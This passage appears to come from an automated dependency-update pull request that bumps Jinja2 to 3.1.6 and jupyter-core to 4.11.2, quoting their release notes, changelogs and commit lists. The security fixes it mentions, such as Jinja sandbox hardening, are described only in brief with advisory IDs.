notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pallets/jinja/releases\"\u003ejinja2's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e3.1.6\u003c/h2\u003e\n\u003cp\u003eThis is the Jinja 3.1.6 security release, which fixes security issues but does not otherwise change behavior and should not result in breaking changes compared to the latest feature release.\u003c/p\u003e\n\u003cp\u003ePyPI: \u003ca href=\"https://pypi.org/project/Jinja2/3.1.6/\"\u003ehttps://pypi.org/project/Jinja2/3.1.6/\u003c/a\u003e\nChanges: \u003ca href=\"https://jinja.palletsprojects.com/en/stable/changes/#version-3-1-6\"\u003ehttps://jinja.palletsprojects.com/en/stable/changes/#version-3-1-6\u003c/a\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eThe \u003ccode\u003e|attr\u003c/code\u003e filter does not bypass the environment's attribute lookup, allowing the sandbox to apply its checks. \u003ca href=\"https://github.com/pallets/jinja/security/advisories/GHSA-cpwx-vrp4-4pq7\"\u003ehttps://github.com/pallets/jinja/security/advisories/GHSA-cpwx-vrp4-4pq7\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.1.5\u003c/h2\u003e\n\u003cp\u003eThis is the Jinja 3.1.5 security fix release, which fixes security issues and bugs but does not otherwise change behavior and should not result in breaking changes compared to the latest feature release.\u003c/p\u003e\n\u003cp\u003ePyPI: \u003ca href=\"https://pypi.org/project/Jinja2/3.1.5/\"\u003ehttps://pypi.org/project/Jinja2/3.1.5/\u003c/a\u003e\nChanges: \u003ca href=\"https://jinja.palletsprojects.com/changes/#version-3-1-5\"\u003ehttps://jinja.palletsprojects.com/changes/#version-3-1-5\u003c/a\u003e\nMilestone: \u003ca href=\"https://github.com/pallets/jinja/milestone/16?closed=1\"\u003ehttps://github.com/pallets/jinja/milestone/16?closed=1\u003c/a\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eThe sandboxed environment handles indirect calls to \u003ccode\u003estr.format\u003c/code\u003e, such as by passing a stored reference to a filter that calls its argument. \u003ca href=\"https://github.com/pallets/jinja/security/advisories/GHSA-q2x7-8rv6-6q7h\"\u003eGHSA-q2x7-8rv6-6q7h\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eEscape template name before formatting it into error messages, to avoid issues with names that contain f-string syntax. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1792\"\u003e#1792\u003c/a\u003e, \u003ca href=\"https://github.com/pallets/jinja/security/advisories/GHSA-gmj6-6f8f-6699\"\u003eGHSA-gmj6-6f8f-6699\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eSandbox does not allow \u003ccode\u003eclear\u003c/code\u003e and \u003ccode\u003epop\u003c/code\u003e on known mutable sequence types. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/2032\"\u003e#2032\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eCalling sync \u003ccode\u003erender\u003c/code\u003e for an async template uses \u003ccode\u003easyncio.run\u003c/code\u003e. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1952\"\u003e#1952\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAvoid unclosed \u003ccode\u003eauto_aiter\u003c/code\u003e warnings. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1960\"\u003e#1960\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eReturn an \u003ccode\u003eaclose\u003c/code\u003e-able \u003ccode\u003eAsyncGenerator\u003c/code\u003e from \u003ccode\u003eTemplate.generate_async\u003c/code\u003e. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1960\"\u003e#1960\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAvoid leaving \u003ccode\u003eroot_render_func()\u003c/code\u003e unclosed in \u003ccode\u003eTemplate.generate_async\u003c/code\u003e. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1960\"\u003e#1960\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAvoid leaving async generators unclosed in blocks, includes and extends. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1960\"\u003e#1960\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eThe runtime uses the correct \u003ccode\u003econcat\u003c/code\u003e function for the current environment when calling block references. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1701\"\u003e#1701\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eMake \u003ccode\u003e|unique\u003c/code\u003e async-aware, allowing it to be used after another async-aware filter. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1781\"\u003e#1781\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e|int\u003c/code\u003e filter handles \u003ccode\u003eOverflowError\u003c/code\u003e from scientific notation. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1921\"\u003e#1921\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eMake compiling deterministic for tuple unpacking in a \u003ccode\u003e{% set ... %}\u003c/code\u003e call. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/2021\"\u003e#2021\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix dunder protocol (\u003ccode\u003ecopy\u003c/code\u003e/\u003ccode\u003epickle\u003c/code\u003e/etc) interaction with \u003ccode\u003eUndefined\u003c/code\u003e objects. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/2025\"\u003e#2025\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix \u003ccode\u003ecopy\u003c/code\u003e/\u003ccode\u003epickle\u003c/code\u003e support for the internal \u003ccode\u003emissing\u003c/code\u003e object. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/2027\"\u003e#2027\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eEnvironment.overlay(enable_async)\u003c/code\u003e is applied correctly. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/2061\"\u003e#2061\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eThe error message from \u003ccode\u003eFileSystemLoader\u003c/code\u003e includes the paths that were searched. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1661\"\u003e#1661\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ePackageLoader\u003c/code\u003e shows a clearer error message when the package does not contain the templates directory. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1705\"\u003e#1705\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eImprove annotations for methods returning copies. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1880\"\u003e#1880\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eurlize\u003c/code\u003e does not add \u003ccode\u003emailto:\u003c/code\u003e to values like \u003ccode\u003e@a@b\u003c/code\u003e. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1870\"\u003e#1870\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eTests decorated with \u003ccode\u003e@pass_context\u003c/code\u003e can be used with the \u003ccode\u003e|select\u003c/code\u003e filter. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1624\"\u003e#1624\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUsing \u003ccode\u003eset\u003c/code\u003e for multiple assignment (\u003ccode\u003ea, b = 1, 2\u003c/code\u003e) does not fail when the target is a namespace attribute. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1413\"\u003e#1413\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUsing \u003ccode\u003eset\u003c/code\u003e in all branches of \u003ccode\u003e{% if %}{% elif %}{% else %}\u003c/code\u003e blocks does not cause the variable to be considered initially undefined. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1253\"\u003e#1253\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.1.4\u003c/h2\u003e\n\u003cp\u003eThis is the Jinja 3.1.4 security release, which fixes security issues and bugs but does not otherwise change behavior and should not result in breaking changes.\u003c/p\u003e\n\u003cp\u003ePyPI: \u003ca href=\"https://pypi.org/project/Jinja2/3.1.4/\"\u003ehttps://pypi.org/project/Jinja2/3.1.4/\u003c/a\u003e\nChanges: \u003ca href=\"https://jinja.palletsprojects.com/en/3.1.x/changes/#version-3-1-4\"\u003ehttps://jinja.palletsprojects.com/en/3.1.x/changes/#version-3-1-4\u003c/a\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eThe \u003ccode\u003exmlattr\u003c/code\u003e filter does not allow keys with \u003ccode\u003e/\u003c/code\u003e solidus, \u003ccode\u003e\u0026gt;\u003c/code\u003e greater-than sign, or \u003ccode\u003e=\u003c/code\u003e equals sign, in addition to disallowing spaces. Regardless of any validation done by Jinja, user input should never be used as keys to this filter, or must be separately validated first. GHSA-h75v-3vvj-5mfj\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.1.3\u003c/h2\u003e\n\u003cp\u003eThis is a fix release for the 3.1.x feature branch.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFix for \u003ca href=\"https://github.com/pallets/jinja/security/advisories/GHSA-h5c8-rqwp-cp95\"\u003eGHSA-h5c8-rqwp-cp95\u003c/a\u003e. You are affected if you are using \u003ccode\u003exmlattr\u003c/code\u003e and passing user input as attribute keys.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pallets/jinja/blob/main/CHANGES.rst\"\u003ejinja2's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eVersion 3.1.6\u003c/h2\u003e\n\u003cp\u003eReleased 2025-03-05\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eThe \u003ccode\u003e|attr\u003c/code\u003e filter does not bypass the environment's attribute lookup,\nallowing the sandbox to apply its checks. :ghsa:\u003ccode\u003ecpwx-vrp4-4pq7\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eVersion 3.1.5\u003c/h2\u003e\n\u003cp\u003eReleased 2024-12-21\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eThe sandboxed environment handles indirect calls to \u003ccode\u003estr.format\u003c/code\u003e, such as\nby passing a stored reference to a filter that calls its argument.\n:ghsa:\u003ccode\u003eq2x7-8rv6-6q7h\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eEscape template name before formatting it into error messages, to avoid\nissues with names that contain f-string syntax.\n:issue:\u003ccode\u003e1792\u003c/code\u003e, :ghsa:\u003ccode\u003egmj6-6f8f-6699\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eSandbox does not allow \u003ccode\u003eclear\u003c/code\u003e and \u003ccode\u003epop\u003c/code\u003e on known mutable sequence\ntypes. :issue:\u003ccode\u003e2032\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eCalling sync \u003ccode\u003erender\u003c/code\u003e for an async template uses \u003ccode\u003easyncio.run\u003c/code\u003e.\n:pr:\u003ccode\u003e1952\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAvoid unclosed \u003ccode\u003eauto_aiter\u003c/code\u003e warnings. :pr:\u003ccode\u003e1960\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eReturn an \u003ccode\u003eaclose\u003c/code\u003e-able \u003ccode\u003eAsyncGenerator\u003c/code\u003e from\n\u003ccode\u003eTemplate.generate_async\u003c/code\u003e. :pr:\u003ccode\u003e1960\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAvoid leaving \u003ccode\u003eroot_render_func()\u003c/code\u003e unclosed in\n\u003ccode\u003eTemplate.generate_async\u003c/code\u003e. :pr:\u003ccode\u003e1960\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAvoid leaving async generators unclosed in blocks, includes and extends.\n:pr:\u003ccode\u003e1960\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eThe runtime uses the correct \u003ccode\u003econcat\u003c/code\u003e function for the current environment\nwhen calling block references. :issue:\u003ccode\u003e1701\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eMake \u003ccode\u003e|unique\u003c/code\u003e async-aware, allowing it to be used after another\nasync-aware filter. :issue:\u003ccode\u003e1781\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e|int\u003c/code\u003e filter handles \u003ccode\u003eOverflowError\u003c/code\u003e from scientific notation.\n:issue:\u003ccode\u003e1921\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eMake compiling deterministic for tuple unpacking in a \u003ccode\u003e{% set ... %}\u003c/code\u003e\ncall. :issue:\u003ccode\u003e2021\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eFix dunder protocol (\u003ccode\u003ecopy\u003c/code\u003e/\u003ccode\u003epickle\u003c/code\u003e/etc) interaction with \u003ccode\u003eUndefined\u003c/code\u003e\nobjects. :issue:\u003ccode\u003e2025\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eFix \u003ccode\u003ecopy\u003c/code\u003e/\u003ccode\u003epickle\u003c/code\u003e support for the internal \u003ccode\u003emissing\u003c/code\u003e object.\n:issue:\u003ccode\u003e2027\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eEnvironment.overlay(enable_async)\u003c/code\u003e is applied correctly. :pr:\u003ccode\u003e2061\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eThe error message from \u003ccode\u003eFileSystemLoader\u003c/code\u003e includes the paths that were\nsearched. :issue:\u003ccode\u003e1661\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ePackageLoader\u003c/code\u003e shows a clearer error message when the package does not\ncontain the templates directory. :issue:\u003ccode\u003e1705\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eImprove annotations for methods returning copies. :pr:\u003ccode\u003e1880\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eurlize\u003c/code\u003e does not add \u003ccode\u003emailto:\u003c/code\u003e to values like \u003ccode\u003e@a@b\u003c/code\u003e. :pr:\u003ccode\u003e1870\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/15206881c006c79667fe5154fe80c01c65410679\"\u003e\u003ccode\u003e1520688\u003c/code\u003e\u003c/a\u003e release version 3.1.6\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/90457bbf33b8662926ae65cdde4c4c32e756e403\"\u003e\u003ccode\u003e90457bb\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/065334d1ee5b7210e1a0a93c37238c86858f2af7\"\u003e\u003ccode\u003e065334d\u003c/code\u003e\u003c/a\u003e attr filter uses env.getattr\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/033c20015c7ca899ab52eb921bb0f08e6d3dd145\"\u003e\u003ccode\u003e033c200\u003c/code\u003e\u003c/a\u003e start version 3.1.6\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/bc68d4efa99c5f77334f0e519628558059ae8c35\"\u003e\u003ccode\u003ebc68d4e\u003c/code\u003e\u003c/a\u003e use global contributing guide (\u003ca href=\"https://redirect.github.com/pallets/jinja/issues/2070\"\u003e#2070\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/247de5e0c5062a792eb378e50e13e692885ee486\"\u003e\u003ccode\u003e247de5e\u003c/code\u003e\u003c/a\u003e use global contributing guide\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/ab8218c7a1b66b62e0ad6b941bd514e3a64a358f\"\u003e\u003ccode\u003eab8218c\u003c/code\u003e\u003c/a\u003e use project advisory link instead of global\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/b4ffc8ff299dfd360064bea4cd2f862364601ad2\"\u003e\u003ccode\u003eb4ffc8f\u003c/code\u003e\u003c/a\u003e release version 3.1.5 (\u003ca href=\"https://redirect.github.com/pallets/jinja/issues/2066\"\u003e#2066\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/877f6e51be8e1765b06d911cfaa9033775f051d1\"\u003e\u003ccode\u003e877f6e5\u003c/code\u003e\u003c/a\u003e release version 3.1.5\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/8d588592653b052f957b720e1fc93196e06f207f\"\u003e\u003ccode\u003e8d58859\u003c/code\u003e\u003c/a\u003e remove test pypi\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/pallets/jinja/compare/2.11.2...3.1.6\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `jupyter-core` from 4.6.3 to 4.11.2\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/jupyter/jupyter_core/releases\"\u003ejupyter-core's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e4.11.1\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFix inclusion of jupyter file and check in CI by \u003ca href=\"https://github.com/blink1073\"\u003e\u003ccode\u003e@​blink1073\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jupyter/jupyter_core/pull/276\"\u003ejupyter/jupyter_core#276\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/jupyter/jupyter_core/compare/4.11.0...4.11.1\"\u003ehttps://github.com/jupyter/jupyter_core/compare/4.11.0...4.11.1\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003e4.11.0\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUse hatch backend by \u003ca href=\"https://github.com/blink1073\"\u003e\u003ccode\u003e@​blink1073\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jupyter/jupyter_core/pull/265\"\u003ejupyter/jupyter_core#265\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eis_hidden: Use normalized paths by \u003ca href=\"https://github.com/martinRenou\"\u003e\u003ccode\u003e@​martinRenou\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jupyter/jupyter_core/pull/271\"\u003ejupyter/jupyter_core#271\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/martinRenou\"\u003e\u003ccode\u003e@​martinRenou\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/jupyter/jupyter_core/pull/271\"\u003ejupyter/jupyter_core#271\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/jupyter/jupyter_core/compare/4.10.0...4.11.0\"\u003ehttps://github.com/jupyter/jupyter_core/compare/4.10.0...4.11.0\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003e4.10.0\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate changelog for 4.9.2 by \u003ca href=\"https://github.com/blink1073\"\u003e\u003ccode\u003e@​blink1073\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jupyter/jupyter_core/pull/252\"\u003ejupyter/jupyter_core#252\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eInclude all files from \u003ccode\u003ejupyter_core\u003c/code\u003e by \u003ca href=\"https://github.com/jonringer\"\u003e\u003ccode\u003e@​jonringer\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jupyter/jupyter_core/pull/253\"\u003ejupyter/jupyter_core#253\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd project URLs to setup.cfg by \u003ca href=\"https://github.com/tlinhart\"\u003e\u003ccode\u003e@​tlinhart\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jupyter/jupyter_core/pull/254\"\u003ejupyter/jupyter_core#254\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eSet up pre-commit by \u003ca href=\"https://github.com/blink1073\"\u003e\u003ccode\u003e@​blink1073\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jupyter/jupyter_core/pull/255\"\u003ejupyter/jupyter_core#255\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[pre-commit.ci] pre-commit autoupdate by \u003ca href=\"https://github.com/pre-commit-ci\"\u003e\u003ccode\u003e@​pre-commit-ci\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jupyter/jupyter_core/pull/257\"\u003ejupyter/jupyter_core#257\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd flake8 and mypy settings by \u003ca href=\"https://github.com/blink1073\"\u003e\u003ccode\u003e@​blink1073\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jupyter/jupyter_core/pull/256\"\u003ejupyter/jupyter_core#256\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eClean up CI by \u003ca href=\"https://github.com/blink1073\"\u003e\u003ccode\u003e@​blink1073\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jupyter/jupyter_core/pull/258\"\u003ejupyter/jupyter_core#258\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUpdate changelog for 4.10 Release by \u003ca href=\"https://github.com/blink1073\"\u003e\u003ccode\u003e@​blink1073\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jupyter/jupyter_core/pull/259\"\u003ejupyter/jupyter_core#259\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jonringer\"\u003e\u003ccode\u003e@​jonringer\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/jupyter/jupyter_core/pull/253\"\u003ejupyter/jupyter_core#253\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/tlinhart\"\u003e\u003ccode\u003e@​tlinhart\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/jupyter/jupyter_core/pull/254\"\u003ejupyter/jupyter_core#254\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pre-commit-ci\"\u003e\u003ccode\u003e@​pre-commit-ci\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/jupyter/jupyter_core/pull/257\"\u003ejupyter/jupyter_core#257\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/jupyter/jupyter_core/compare/4.9.2...4.10.0\"\u003ehttps://github.com/jupyter/jupyter_core/compare/4.9.2...4.10.0\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003e4.9.2\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eset proper sys.argv[0] for subcommand by \u003ca href=\"https://github.com/bnavigator\"\u003e\u003ccode\u003e@​bnavigator\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jupyter/jupyter_core/pull/248\"\u003ejupyter/jupyter_core#248\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd explicit encoding in open calls by \u003ca href=\"https://github.com/dlukes\"\u003e\u003ccode\u003e@​dlukes\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jupyter/jupyter_core/pull/249\"\u003ejupyter/jupyter_core#249\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ejupyter_config_dir - reorder home_dir initialization by \u003ca href=\"https://github.com/dharmaquark\"\u003e\u003ccode\u003e@​dharmaquark\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jupyter/jupyter_core/pull/251\"\u003ejupyter/jupyter_core#251\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/bnavigator\"\u003e\u003ccode\u003e@​bnavigator\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/jupyter/jupyter_core/pull/248\"\u003ejupyter/jupyter_core#248\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/dlukes\"\u003e\u003ccode\u003e@​dlukes\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/jupyter/jupyter_core/pull/249\"\u003ejupyter/jupyter_core#249\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/dharmaquark\"\u003e\u003ccode\u003e@​dharmaquark\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/jupyter/jupyter_core/pull/251\"\u003ejupyter/jupyter_core#251\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/jupyter/jupyter_core/compare/4.9.1...4.9.2\"\u003ehttps://github.com/jupyter/jupyter_core/compare/4.9.1...4.9.2\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/jupyter/jupyter_core/blob/main/CHANGELOG.md\"\u003ejupyter-core's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003eChanges in jupyter-core\u003c/h1\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003ch2\u003e5.8.1\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003ch2\u003e5.8.0\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003ch2\u003e5.7.2\u003c/h2\u003e\n\u003cp\u003e(\u003ca href=\"https://github.com/jupyter/jupyter_core/compare/v5.7.1...1264a81fc834f18db2b41e136ec4ac9d1a4ad993\"\u003eFull Changelog\u003c/a\u003e)\u003c/p\u003e\n\u003ch3\u003eMaintenance and upkeep improvements\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate Release Scripts \u003ca href=\"https://redirect.github.com/jupyter/jupyter_core/pull/396\"\u003e#396\u003c/a\u003e (\u003ca href=\"https://github.com/blink1073\"\u003e\u003ccode\u003e@​blink1073\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eEnforce pytest 7 \u003ca href=\"https://redirect.github.com/jupyter/jupyter_core/pull/393\"\u003e#393\u003c/a\u003e (\u003ca href=\"https://github.com/blink1073\"\u003e\u003ccode\u003e@​blink1073\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003echore: update pre-commit hooks \u003ca href=\"https://redirect.github.com/jupyter/jupyter_core/pull/392\"\u003e#392\u003c/a\u003e (\u003ca href=\"https://github.com/pre-commit-ci\"\u003e\u003ccode\u003e@​pre-commit-ci\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eContributors to this release\u003c/h3\u003e\n\u003cp\u003e(\u003ca href=\"https://github.com/jupyter/jupyter_core/graphs/contributors?from=2024-01-08\u0026amp;to=2024-03-12\u0026amp;type=c\"\u003eGitHub contributors page for this release\u003c/a\u003e)\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/search?q=repo%3Ajupyter%2Fjupyter_core+involves%3Ablink1073+updated%3A2024-01-08..2024-03-12\u0026amp;type=Issues\"\u003e\u003ccode\u003e@​blink1073\u003c/code\u003e\u003c/a\u003e | \u003ca href=\"https://github.com/search?q=repo%3Ajupyter%2Fjupyter_core+involves%3Apre-commit-ci+updated%3A2024-01-08..2024-03-12\u0026amp;type=Issues\"\u003e\u003ccode\u003e@​pre-commit-ci\u003c/code\u003e\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003e5.7.1\u003c/h2\u003e\n\u003cp\u003e(\u003ca 